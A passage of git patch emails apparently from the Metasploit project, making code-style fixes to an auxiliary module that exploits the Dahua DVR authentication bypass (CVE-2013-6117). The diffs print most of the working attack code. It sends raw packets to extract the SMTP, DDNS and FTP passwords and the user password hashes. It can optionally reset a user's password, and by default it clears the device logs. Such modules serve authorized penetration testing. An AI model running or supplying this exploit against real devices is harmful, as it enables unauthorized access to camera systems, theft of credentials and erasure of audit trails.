sock.get(1024) + sock.put(u1) + if data == sock.get(1024) + print_good("PASSWORD RESET!: user #{datastore['USERNAME']}'s password reset to #{datastore['PASSWORD']}! @ #{rhost}:#{rport}!") + end # elsif (datastore['ACTION'] == "DELETE") # u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" @@ -297,12 +288,12 @@ class Metasploit3 < Msf::Auxiliary end if datastore['CLEAR_LOGS'] - sock.put(clear_logs) - sock.put(clear_logs2) - print_good("LOGS CLEARED! @ #{rhost}:#{rport}") + sock.put(clear_logs) + sock.put(clear_logs2) + print_good("LOGS CLEARED! @ #{rhost}:#{rport}") end disconnect - end + end end def report_hash(ip, rport, user, hash) From 38c4e4ee6c4936923843b45ac51fc0ae1c884e46 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Tue, 17 Nov 2015 10:48:57 -0500 Subject: [PATCH 012/686] added a few more rubocop fixes --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 40 +++++++++---------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 14bc93f41c..c028f81bd6 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -1,26 +1,26 @@ class Metasploit3 < Msf::Auxiliary - include Msf::Exploit::Remote::Tcp - include Msf::Auxiliary::Scanner - include Msf::Auxiliary::Report + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report def initialize - super( - 'Name' => 'Dahua DVR Auth Bypas Scanner', - 'Version' => '$Revision: 1 $', - 'Description' => 'Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user\'s password and clears the device logs', - 'Author' => [ - 'Jake Reynolds - Depth Security', #Vulnerability Discoverer - 'Tyler Bennett - Talos Infosec' # Metasploit Module - ], - 'References' => - [ - [ 'CVE', '2013-6117' ], - [ 'URL', 'https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117' ] - ], - 'License' => MSF_LICENSE - ) - deregister_options('RHOST') - register_options( + super( + 'Name' => 'Dahua DVR Auth Bypas Scanner', + 'Version' => '$Revision: 1 $', + 'Description' => 'Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user\'s password and clears the device logs', + 'Author' => [ + 'Jake Reynolds - Depth Security', # Vulnerability Discoverer + 'Tyler Bennett - Talos Infosec' # Metasploit Module + ], + 'References' => + [ + [ 'CVE', '2013-6117' ], + [ 'URL', 'https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117' ] + ], + 'License' => MSF_LICENSE + ) + deregister_options('RHOST') + register_options( [ OptString.new('USERNAME', [true, 'A username to reset', '888888']), OptString.new('PASSWORD', [true, 'A password to reset the user with', 'abc123']), From 6e4ccb46e547029b2cedb538b8f33c62901e803a Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Tue, 17 Nov 2015 11:44:11 -0500 Subject: [PATCH 013/686] knocked out a few more rubocop errors --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 104 +++++++++--------- 1 file changed, 51 insertions(+), 53 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index c028f81bd6..13b58189a6 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -12,22 +12,20 @@ class Metasploit3 < Msf::Auxiliary 'Jake Reynolds - Depth Security', # Vulnerability Discoverer 'Tyler Bennett - Talos Infosec' # Metasploit Module ], - 'References' => - [ + 'References' => [ [ 'CVE', '2013-6117' ], [ 'URL', 'https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117' ] ], 'License' => MSF_LICENSE ) - deregister_options('RHOST') - register_options( - [ - OptString.new('USERNAME', [true, 'A username to reset', '888888']), - OptString.new('PASSWORD', [true, 'A password to reset the user with', 'abc123']), - OptBool.new('RESET', [true, 'Reset an existing user\'s pw?', 'FALSE']), - OptBool.new('CLEAR_LOGS', [true, 'Clear the DVR logs when we\'re done?', 'TRUE']), - Opt::RPORT(37777) - ], self.class) + # deregister_options('RHOST') + register_options([ + OptString.new('USERNAME', [true, 'A username to reset', '888888']), + OptString.new('PASSWORD', [true, 'A password to reset the user with', 'abc123']), + OptBool.new('RESET', [true, 'Reset an existing user\'s pw?', 'FALSE']), + OptBool.new('CLEAR_LOGS', [true, 'Clear the DVR logs when we\'re done?', 'TRUE']), + Opt::RPORT(37777) + ], self.class) end def run_host(ip) @@ -90,8 +88,8 @@ class Metasploit3 < Msf::Auxiliary print_status("Email Settings: @ #{rhost}:#{rport}!") if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ if mailhost == $1.split(':') - print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? - print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? + print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? + print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? end if !data[5].nil? && !data[6].nil? print_good(" SMTP User: #{data[5]}") unless data[5].nil? @@ -298,25 +296,25 @@ class Metasploit3 < Msf::Auxiliary def report_hash(ip, rport, user, hash) service_data = { - address: ip, - port: rport, - service_name: 'dahua_dvr', - protocol: 'tcp', - workspace_id: myworkspace_id + address: ip, + port: rport, + service_name: 'dahua_dvr', + protocol: 'tcp', + workspace_id: myworkspace_id } credential_data = { - module_fullname: :fullname, - origin_type: :service, - private_data: hash, - private_type: :nonreplayable_hash, - jtr_format: 'dahua_hash', - username: user + module_fullname: :fullname, + origin_type: :service, + private_data: hash, + private_type: :nonreplayable_hash, + jtr_format: 'dahua_hash', + username: user }.merge(service_data) login_data = { - core: create_credential(credential_data), - status: Metasploit::Model::Login::Status::UNTRIED + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED }.merge(service_data) create_credential_login(login_data) @@ -324,51 +322,51 @@ class Metasploit3 < Msf::Auxiliary def report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) service_data = { - address: ddns_server, - port: ddns_port, - service_name: 'ddns settings', - protocol: 'tcp', - workspace_id: myworkspace_id + address: ddns_server, + port: ddns_port, + service_name: 'ddns settings', + protocol: 'tcp', + workspace_id: myworkspace_id } credential_data = { - module_fullname: :fullname, - origin_type: :service, - private_data: ddns_pass, - private_type: :password, - username: ddns_user + module_fullname: :fullname, + origin_type: :service, + private_data: ddns_pass, + private_type: :password, + username: ddns_user }.merge(service_data) login_data = { - core: create_credential(credential_data), - status: Metasploit::Model::Login::Status::UNTRIED + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED }.merge(service_data) - create_credential_login(login_data) - end + create_credential_login(login_data) + end def report_email_cred(mailserver, rport, muser, mpass) service_data = { - address: mailserver, - port: rport, - service_name: 'email settings', - protocol: 'tcp', - workspace_id: myworkspace_id + address: mailserver, + port: rport, + service_name: 'email settings', + protocol: 'tcp', + workspace_id: myworkspace_id } credential_data = { - module_fullname: :fullname, - origin_type: :service, - private_data: mpass, - private_type: :password, - username: muser + module_fullname: :fullname, + origin_type: :service, + private_data: mpass, + private_type: :password, + username: muser }.merge(service_data) login_data = { - core: create_credential(credential_data), - status: Metasploit::Model::Login::Status::UNTRIED + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED }.merge(service_data) - create_credential_login(login_data) + create_credential_login(login_data) end end From e55ac99c12d69bb3efd3ef12843e4a08bc0794dd Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Tue, 17 Nov 2015 14:30:33 -0500 Subject: [PATCH 014/686] fixed a bunch more rubocop errors --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 558 +++++++++--------- 1 file changed, 279 insertions(+), 279 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 13b58189a6..57a8fc9f0a 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -3,216 +3,216 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report - def initialize - super( - 'Name' => 'Dahua DVR Auth Bypas Scanner', - 'Version' => '$Revision: 1 $', - 'Description' => 'Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user\'s password and clears the device logs', - 'Author' => [ - 'Jake Reynolds - Depth Security', # Vulnerability Discoverer - 'Tyler Bennett - Talos Infosec' # Metasploit Module - ], - 'References' => [ - [ 'CVE', '2013-6117' ], - [ 'URL', 'https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117' ] - ], - 'License' => MSF_LICENSE - ) - # deregister_options('RHOST') - register_options([ - OptString.new('USERNAME', [true, 'A username to reset', '888888']), - OptString.new('PASSWORD', [true, 'A password to reset the user with', 'abc123']), - OptBool.new('RESET', [true, 'Reset an existing user\'s pw?', 'FALSE']), - OptBool.new('CLEAR_LOGS', [true, 'Clear the DVR logs when we\'re done?', 'TRUE']), - Opt::RPORT(37777) - ], self.class) + def initialize + super( + 'Name' => 'Dahua DVR Auth Bypas Scanner', + 'Version' => '$Revision: 1 $', + 'Description' => 'Scans for Dahua-based DVRs and then grabs settings. Optionally resets a user\'s password and clears the device logs', + 'Author' => [ + 'Jake Reynolds - Depth Security', # Vulnerability Discoverer + 'Tyler Bennett - Talos Infosec' # Metasploit Module + ], + 'References' => [ + [ 'CVE', '2013-6117' ], + [ 'URL', 'https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117' ] + ], + 'License' => MSF_LICENSE + ) + deregister_options('RHOST') + register_options([ + OptString.new('USERNAME', [true, 'A username to reset', '888888']), + OptString.new('PASSWORD', [true, 'A password to reset the user with', 'abc123']), + OptBool.new('RESET', [true, 'Reset an existing user\'s pw?', 'FALSE']), + OptBool.new('CLEAR_LOGS', [true, 'Clear the DVR logs when we\'re done?', 'TRUE']), + Opt::RPORT(37777) + ], self.class) + end + + def run_host(ip) + usercount = 0 + u1 = "\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + dvr_resp = "\xb1\x00\x00\x58\x00\x00\x00\x00" + version = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + email = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ + "\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + ddns = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ + "\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + nas = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ + "\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + channels = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + groups = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + users = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + sn = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + clear_logs = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + clear_logs2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + user = "root" + pass = " w" + # user8pwhash = "4WzwxXxM" #888888 + # user6pwhash = "sh15yfFM" #666666 + # useradminpwhash = "6QNMIQGe" #admin + connect + sock.put(u1) + data = sock.recv(8) + disconnect + if data == dvr_resp + print_good("DVR FOUND: @ #{rhost}:#{rport}!") + report_service(host: rhost, port: rport, sname: 'dvr', info: "Dahua-based DVR") + connect + sock.put(version) + data = sock.get(1024) + if data =~ /[\x00]{8,}([[:print:]]+)/ + ver = Regexp.last_match[1] + print_status("Version: #{ver} @ #{rhost}:#{rport}!") + end + + sock.put(sn) + data = sock.get(1024) + if data =~ /[\x00]{8,}([[:print:]]+)/ + serial = Regexp.last_match[1] + print_status("Serial Number: #{serial} @ #{rhost}:#{rport}!") + end + + sock.put(email) + if data == sock.get(1024).split('&&') + print_status("Email Settings: @ #{rhost}:#{rport}!") + if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ + if mailhost == Regexp.last_match[1].split(':') + print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? + print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? + end + if !data[5].nil? && !data[6].nil? + print_good(" SMTP User: #{data[5]}") unless data[5].nil? + print_good(" SMTP Password: #{data[6]}") unless data[6].nil? + muser = "#{data[5]}" + mpass = "#{data[6]}" + mailserver = "#{mailhost[0]}" + print_good("MailServer: #{mailserver}") + # destemail = "#{data[1]}" if !mailhost[1].nil? + if !mailserver.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0 + report_email_creds(mailserver, rport, muser, mpass) if !mailserver.nil? && !muser.nil? && !mpass.nil? + end + end end + end - def run_host(ip) - usercount = 0 - u1 = "\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - dvr_resp = "\xb1\x00\x00\x58\x00\x00\x00\x00" - version = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - email = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ - "\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - ddns = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ - "\x8c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - nas = "\xa3\x00\x00\x00\x00\x00\x00\x00\x63\x6f\x6e\x66\x69\x67\x00\x00" \ - "\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - channels = "\xa8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ - "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - groups = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - users = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - sn = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - clear_logs = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - clear_logs2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + sock.put(ddns) + if data == sock.get(1024) + data = data.split(/&&[0-1]&&/) + data.each_with_index do |val, index| + if index > 0 + val = val.split("&&") + ddns_service = "#{val[0]}" + ddns_server = "#{val[1]}" + ddns_port = "#{val[2]}" + ddns_domain = "#{val[3]}" + ddns_user = "#{val[4]}" + ddns_pass = "#{val[5]}" + print_status("DDNS Settings @ #{rhost}:#{rport}!:") + print_status(" DDNS Service: #{ddns_service}") unless val.nil? + print_status(" DDNS Server: #{ddns_server}") unless val.nil? + print_status(" DDNS Port: #{ddns_port}") unless val.nil? + print_status(" Domain: #{ddns_domain}") unless val.nil? + print_good(" Username: #{ddns_user}") unless val.nil? + print_good(" Password: #{ddns_pass}") unless val.nil? + if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0 - user = "root" - pass = " w" - # user8pwhash = "4WzwxXxM" #888888 - # user6pwhash = "sh15yfFM" #666666 - # useradminpwhash = "6QNMIQGe" #admin - connect - sock.put(u1) - data = sock.recv(8) - disconnect - if data == dvr_resp - print_good("DVR FOUND: @ #{rhost}:#{rport}!") - report_service(host: rhost, port: rport, sname: 'dvr', info: "Dahua-based DVR") - connect - sock.put(version) - data = sock.get(1024) - if data =~ /[\x00]{8,}([[:print:]]+)/ - ver = $1 - print_status("Version: #{ver} @ #{rhost}:#{rport}!") - end + report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) + end + end + end + end - sock.put(sn) - data = sock.get(1024) - if data =~ /[\x00]{8,}([[:print:]]+)/ - serial = $1 - print_status("Serial Number: #{serial} @ #{rhost}:#{rport}!") - end + sock.put(nas) + if data == sock.get(1024) + print_status("Nas Settings @ #{rhost}:#{rport}!:") + server = '' + port = '' + if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ + server = Regexp.last_match[1].unpack('C*').join('.') + port = Regexp.last_match[2].unpack('S') + print_status(" Nas Server #{server}") + print_status(" Nas Port: #{port}") + end + if data =~ /[\x00]{16,}([[:print:]]+)[\x00]{16,}([[:print:]]+)/ + ftpuser = Regexp.last_match[1] + ftppass = Regexp.last_match[2] + print_good(" FTP User: #{ftpuser}") + print_good(" FTP Password: #{ftppass}") + if !ftpuser.to_s.strip.length == 0 && ftppass.to_s.strip.length == 0 + report_creds(host: server, port: port, user: ftpuser, pass: ftppass, type: "FTP", + active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil? + end + end + end - sock.put(email) - if data == sock.get(1024).split('&&') - print_status("Email Settings: @ #{rhost}:#{rport}!") - if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ - if mailhost == $1.split(':') - print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? - print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? - end - if !data[5].nil? && !data[6].nil? - print_good(" SMTP User: #{data[5]}") unless data[5].nil? - print_good(" SMTP Password: #{data[6]}") unless data[6].nil? - muser = "#{data[5]}" - mpass = "#{data[6]}" - mailserver = "#{mailhost[0]}" - print_good("MailServer: #{mailserver}") - # destemail = "#{data[1]}" if !mailhost[1].nil? - if !mailserver.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0 - report_email_creds(mailserver, rport, muser, mpass) if !mailserver.nil? && !muser.nil? && !mpass.nil? - end - end - end - end - - sock.put(ddns) - if data == sock.get(1024) - data = data.split(/&&[0-1]&&/) - data.each_with_index { |val, index| - if index > 0 - val = val.split("&&") - ddns_service = "#{val[0]}" - ddns_server = "#{val[1]}" - ddns_port = "#{val[2]}" - ddns_domain = "#{val[3]}" - ddns_user = "#{val[4]}" - ddns_pass = "#{val[5]}" - print_status("DDNS Settings @ #{rhost}:#{rport}!:") - print_status(" DDNS Service: #{ddns_service}") unless val.nil? - print_status(" DDNS Server: #{ddns_server}") unless val.nil? - print_status(" DDNS Port: #{ddns_port}") unless val.nil? - print_status(" Domain: #{ddns_domain}") unless val.nil? - print_good(" Username: #{ddns_user}") unless val.nil? - print_good(" Password: #{ddns_pass}") unless val.nil? - if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0 - - report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) - end - end - } - end - - sock.put(nas) - if data == sock.get(1024) - print_status("Nas Settings @ #{rhost}:#{rport}!:") - server = '' - port = '' - if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ - server = $1.unpack('C*').join('.') - port = $2.unpack('S') - print_status(" Nas Server #{server}") - print_status(" Nas Port: #{port}") - end - if data =~ /[\x00]{16,}([[:print:]]+)[\x00]{16,}([[:print:]]+)/ - ftpuser = $1 - ftppass = $2 - print_good(" FTP User: #{ftpuser}") - print_good(" FTP Password: #{ftppass}") - if !ftpuser.to_s.strip.length == 0 && ftppass.to_s.strip.length == 0 - report_creds(host: server, port: port, user: ftpuser, pass: ftppass, type: "FTP", - active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil? - end - end - end - - sock.put(channels) - data = sock.get(1024).split('&&') - disconnect - if data.length > 1 - print_status("Camera Channels @ #{rhost}:#{rport}!:") - data.each_with_index { |val, index| print_status(" #{index + 1}:#{val[/([[:print:]]+)/]}") } - end - connect - sock.put(users) - if data == sock.get(1024).split('&&') - print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") - data.each { |val| - usercount += 1 - pass = "#{val[/(([\d]+)[:]([0-9A-Za-z]+)[:]([0-9A-Za-z]+))/]}" - value = pass.split(":") - username = "#{value[1]}" - md5hash = "#{value[2]}" - print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") - # Write the dahua hash to the database - hash = "#{rhost} #{username}:$dahua$#{md5hash}" - report_hash(ip, rport, user, hash) - # Write the vulnerability to the database - # unless reported_vuln - report_vuln( - host: rhost, - port: rport, - proto: 'tcp', - sname: 'dvr', - name: 'Dahua Authentication Password Hash Exposure', - info: "Obtained password hash for user #{username}: #{md5hash}", - refs: :references - ) - } - end - sock.put(groups) - if data == sock.get(1024).split('&&') - print_status("User Groups: @ #{rhost}:#{rport}!") - data.each { |val| print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") } - end - if datastore['RESET'] - userstring = datastore['USERNAME'] + ":Intel:" + datastore['PASSWORD'] + ":" + datastore['PASSWORD'] - u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" \ - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + userstring - sock.put(u1) - # data = sock.get(1024) - sock.put(u2) - # data = sock.get(1024) - sock.put(u3) - data = sock.get(1024) - sock.put(u1) - if data == sock.get(1024) - print_good("PASSWORD RESET!: user #{datastore['USERNAME']}'s password reset to #{datastore['PASSWORD']}! @ #{rhost}:#{rport}!") - end + sock.put(channels) + data = sock.get(1024).split('&&') + disconnect + if data.length > 1 + print_status("Camera Channels @ #{rhost}:#{rport}!:") + data.each_with_index { |val, index| print_status(" #{index + 1}:#{val[/([[:print:]]+)/]}") } + end + connect + sock.put(users) + if data == sock.get(1024).split('&&') + print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") + data.each do |val| + usercount += 1 + pass = "#{val[/(([\d]+)[:]([0-9A-Za-z]+)[:]([0-9A-Za-z]+))/]}" + value = pass.split(":") + username = "#{value[1]}" + md5hash = "#{value[2]}" + print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") + # Write the dahua hash to the database + hash = "#{rhost} #{username}:$dahua$#{md5hash}" + report_hash(ip, rport, user, hash) + # Write the vulnerability to the database + # unless reported_vuln + report_vuln( + host: rhost, + port: rport, + proto: 'tcp', + sname: 'dvr', + name: 'Dahua Authentication Password Hash Exposure', + info: "Obtained password hash for user #{username}: #{md5hash}", + refs: :references + ) + end + end + sock.put(groups) + if data == sock.get(1024).split('&&') + print_status("User Groups: @ #{rhost}:#{rport}!") + data.each { |val| print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") } + end + if datastore['RESET'] + userstring = datastore['USERNAME'] + ":Intel:" + datastore['PASSWORD'] + ":" + datastore['PASSWORD'] + u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + userstring + sock.put(u1) + # data = sock.get(1024) + sock.put(u2) + # data = sock.get(1024) + sock.put(u3) + data = sock.get(1024) + sock.put(u1) + if data == sock.get(1024) + print_good("PASSWORD RESET!: user #{datastore['USERNAME']}'s password reset to #{datastore['PASSWORD']}! @ #{rhost}:#{rport}!") + end # elsif (datastore['ACTION'] == "DELETE") # u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" + # "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" @@ -282,91 +282,91 @@ class Metasploit3 < Msf::Auxiliary # sock.put(1024) # print_good("ADDED USER!: user #{datastore['USERNAME']}'s password is #{datastore['PASSWORD']}") # -# else - end +# else + end - if datastore['CLEAR_LOGS'] - sock.put(clear_logs) - sock.put(clear_logs2) - print_good("LOGS CLEARED! @ #{rhost}:#{rport}") - end - disconnect - end - end + if datastore['CLEAR_LOGS'] + sock.put(clear_logs) + sock.put(clear_logs2) + print_good("LOGS CLEARED! @ #{rhost}:#{rport}") + end + disconnect + end + end - def report_hash(ip, rport, user, hash) - service_data = { - address: ip, - port: rport, - service_name: 'dahua_dvr', - protocol: 'tcp', - workspace_id: myworkspace_id - } + def report_hash(ip, rport, user, hash) + service_data = { + address: ip, + port: rport, + service_name: 'dahua_dvr', + protocol: 'tcp', + workspace_id: myworkspace_id + } - credential_data = { - module_fullname: :fullname, - origin_type: :service, - private_data: hash, - private_type: :nonreplayable_hash, - jtr_format: 'dahua_hash', - username: user - }.merge(service_data) + credential_data = { + module_fullname: :fullname, + origin_type: :service, + private_data: hash, + private_type: :nonreplayable_hash, + jtr_format: 'dahua_hash', + username: user + }.merge(service_data) - login_data = { - core: create_credential(credential_data), - status: Metasploit::Model::Login::Status::UNTRIED - }.merge(service_data) + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED + }.merge(service_data) - create_credential_login(login_data) - end + create_credential_login(login_data) + end - def report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) - service_data = { - 